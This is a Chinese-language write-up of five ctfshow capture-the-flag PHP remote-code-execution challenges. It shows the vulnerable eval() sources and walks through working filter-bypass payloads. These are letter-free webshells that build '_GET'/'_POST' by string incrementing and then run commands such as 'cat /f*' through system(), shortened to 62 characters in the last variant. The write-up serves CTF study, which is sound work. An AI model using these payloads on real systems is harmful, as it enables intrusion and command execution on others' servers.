CTFshow-RCE极限大挑战

前言

ctfshow出的这五道rce感觉挺好玩的，但自己没做出几道来，所以来详细的复现一下，这几道题基本都是利用的自增，但长度逐渐缩短，雀氏极限。

RCE1

源码

<?php



error_reporting(0);



highlight_file(__FILE__);



$code = $_POST['code'];



$code = str_replace("(","括号",$code);



$code = str_replace(".","点",$code);



eval($code);



?>

分析

可以看到我们最后执行的是eval，而过滤的只有( 和. ，而php eval函数的作用是把字符串按照PHP代码来计算，比如果我们写入 echo 1 就会写入1 ，如果我们写入的是一句话木马，就可以成功植入木马，执行rce

payload

code=echo ``;&1=cat /f*

RCE2

<?php



//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势，太棒啦~。

error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow)) {
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}

?>

分析

基本把能用的都过滤了，只剩下$()_+;[],.=/字符，p神的文章好早之前就提出过，自增rce

一些不包含数字和字母的webshell | 离别歌

思路就是，我们rce需要字母，但字母都过滤了，所以我们就要想办法去构造字母，p神是用

强制连接数组和字符串，数组将被转换成字符串，其值为Array，而我们如果取Array的第[0]个字母的话就是A，而A++就是B，例如：

之后我们可以用 . 把字母拼接起来，

payload

注释有分解。

<?php
$_=[];
//得到Array
$_=$_['/'=='+'];
echo $_;//让[]里的值报错返回0,取Array[0]=A，此时$_=A
$____='_';   //让$____=_，后面容易拼接
$__=$_;   //将A赋给$__
$__++;$__++;$__++;$__++;$__++;$__++;  //A自增到G，此时$__=G
$____.=$__; //将_和G拼接起来，此时$____=_G
$__=$_;   //再将$__还原成A
$__++;$__++;$__++;$__++;  //A自增到E,此时__=E
$____.=$__;  //E和_G拼接，此时$____为_GE
$__=$_;  //再将__换源成A
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;  //A自增成T此时__=T
$____.=$__;  //再拼接成_GET，此时$____=_GET
$_=$____;   //为了方便起见，我们把____换成_
//$$_[_]($$_[__]); //拼成我们想要的($_GET[_])($_GET[__]),传入_和__命令执行即可

最后换成一行rce即可

$_=[];$_=$_['/'=='+'];$____='_'; $__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_; $__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$____;$$_[_]($$_[__]);

RCE3

源码

<?php



//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势，太棒啦~。



error_reporting(0);



highlight_file(__FILE__);



 



if (isset($_POST['ctf_show'])) {



    $ctfshow = $_POST['ctf_show'];



    if (is_string($ctfshow) && strlen($ctfshow) <= 105) {



        if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){



            eval($ctfshow);



        }else{



            echo("Are you hacking me AGAIN?");



        }



    }else{



        phpinfo();



    }



}



?>

分析

这个过滤和rce2差不多，但吧1和0给放出来了，也限制了长度<=105，可以看一下这个文章

BSides Noida CTF 2021 Web Calculate_bfengj的博客-CSDN博客

得到NAN再用上面相同的方法获得N,从N开始构造的话长度就比上一个方法少多了，原理还是上一题的自增，试着构造一下，当我是想直接$a[0]的时候，他没有回显，原来是因为现在的NAN还不算字符串,所以后面要在拼接一个例如

就可以得到我们想要的N了，但我我们需要字母才能构造N，就用上一题同样的方法构造出A来，因为0可以用了，所以我们就不用让报错直接用[0]就可以了

然后我们就可以得到N了

之后再跟上一步一样一步一步自增就可以了

<?php
$a=(0/0);//NAN
$a.=_;//NAN_
$a=$a[0];//N
$a++;//O
$o=$a++;//$o=$a++是先把$a的值给$o,然后再对$a进行自增，所以这一句结束的时候 $a是P，$o是O
$p=$a++;//$a=>Q,$p=>P
$a++;$a++;//R
$s=$a++;//S
$t=$a;//T
$_=_;//_
$_.=$p.$o.$s.$t;//_POST
$$_[0]($$_[1]);//$_POST[0]($_POST[1]);

payload

注释有解析。

$_=([].[])[0];    //得到Array
$_=($_/$_.$_)[0];   //__=N
$_++;  //O
$__=$_.$_++;  //拼接PO
$_++;$_++;$_++;  //S
$__.=$_;
$_++;  //T
$_=_.$__.$_;  //拼接_和POST
$$_[0]($$_[1]);  //$_POST[0]($_POST[1])

RCE4，RCE5

之后就是越来越少的长度，就直接分析一下师傅们的pyload

72位

<?php
$a=_(a/a)[a];//N
++$a;//O
$_=$a.$a++;//PO
$a++;$a++;//R
$_=_.$_.++$a.++$a;//_POST
$$_[a]($$_[_]);//$_POST[a]($_POST[_])

1	%2b;$_=_.$_.%2b%2b$%ff.%2b%2b$%ff;$$_[%ff]($$_[_]);&%ff=system&_=cat /f*

68位

$_=_(a/a)[_];//N



$a=++$_;//O



$$a[$a=_.++$_.$a[$_++/$_++].++$_.++$_]($$a[_]);//巧妙的把两次$_++放在一起

1	$a=_.++$_.$a[$_++/$_++].++$_.++$_//$a直接拼接出_POST $$a[_POST]($$a[_])//$_POST[_POST]($_POST[_])

62位

<?PHP



$_=_(_._)[_];//N  //本地使用就用(_._._)[_]



$%FA=++$_;//O



$$%FA[$%FA=_.++$_.$%FA[$_++/$_++].++$_.++$_]($$%FA[%FF]);



//将拼接放到同一行,真的太厉害了,我只能感叹一句nb